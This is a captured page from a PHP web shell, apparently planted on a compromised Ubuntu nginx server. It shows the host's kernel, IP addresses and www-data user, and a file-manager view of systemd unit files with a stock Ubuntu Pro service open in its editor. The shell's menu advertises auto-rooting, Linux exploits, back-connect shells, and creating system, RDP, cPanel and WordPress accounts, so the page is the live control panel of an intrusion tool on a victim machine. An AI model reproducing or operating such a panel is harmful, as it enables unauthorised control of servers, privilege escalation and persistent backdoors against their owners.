Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
clamav-daemon.service
496
B
-rw-r--r--
clamav-freshclam.service
390
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
319
B
-rw-r--r--
dmesg.service
409
B
-rw-r--r--
droplet-agent.service
358
B
-rw-r--r--
e2scrub_reap.service
553
B
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
irqbalance.service
505
B
-rw-r--r--
lxd-agent.service
476
B
-rw-r--r--
mysql.service
529
B
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nginx.service
1.01
KB
-rw-r--r--
open-vm-tools.service
489
B
-rw-r--r--
php8.1-fpm.service
542
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
postfix.service
282
B
-rw-r--r--
remote-fs.target
530
B
-rw-r--r--
rsyslog.service
469
B
-rw-r--r--
secureboot-db.service
735
B
-rw-r--r--
snap-certbot-4965.mount
329
B
-rw-r--r--
snap-certbot-5057.mount
329
B
-rw-r--r--
snap-core-17212.mount
323
B
-rw-r--r--
snap-core-17247.mount
323
B
-rw-r--r--
snap-core20-2599.mount
326
B
-rw-r--r--
snap-core20-2669.mount
326
B
-rw-r--r--
snap-core24-1196.mount
326
B
-rw-r--r--
snap-core24-1225.mount
326
B
-rw-r--r--
snap-lxd-31333.mount
320
B
-rw-r--r--
snap-lxd-35819.mount
320
B
-rw-r--r--
snap-snapd-25202.mount
326
B
-rw-r--r--
snap-snapd-25577.mount
326
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snapd.apparmor.service
1.27
KB
-rw-r--r--
snapd.autoimport.service
487
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
750
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
systemd-networkd.service
2.27
KB
-rw-r--r--
systemd-resolved.service
1.74
KB
-rw-r--r--
ua-reboot-cmds.service
830
B
-rw-r--r--
ubuntu-advantage.service
1.53
KB
-rw-r--r--
ufw.service
333
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ubuntu-advantage.service
# This service runs on GCP and Azure to enable auto-attaching to Ubuntu Pro # services when an Ubuntu Pro license is added to a machine. # It also serves as the retry service if an auto-attach fails and will # retry for up to one month after the failed attempt. # If you are uninterested in Ubuntu Pro services, then you can safely # stop and disable this service: # sudo systemctl stop ubuntu-advantage.service # sudo systemctl disable ubuntu-advantage.service [Unit] Description=Ubuntu Pro Background Auto Attach Documentation=man:ubuntu-advantage https://ubuntu.com/advantage # Note: This is NOT After=cloud-config.service to avoid deadlock when # cloud-init installs this package. # The python script will wait until cloud-config.service is done # before doing anything. After=network.target network-online.target systemd-networkd.service ua-auto-attach.service ubuntu-advantage-cloud-id-shim.service # Only run if not already attached ConditionPathExists=!/var/lib/ubuntu-advantage/private/machine-token.json # This service has two modes: # 1. Detect possible in-place upgrade to pro - on GCP and Azure # 2. auto-attach retry mode - only if ua-auto-attach.service fails # The following conditions correspond to those two modes. ConditionPathExists=|/run/cloud-init/cloud-id-gce ConditionPathExists=|/run/cloud-init/cloud-id-azure ConditionPathExists=|/run/ubuntu-advantage/flags/auto-attach-failed [Service] ExecStart=/usr/bin/python3 /usr/lib/ubuntu-advantage/daemon.py WorkingDirectory=/var/lib/ubuntu-advantage/ [Install] WantedBy=multi-user.target
Close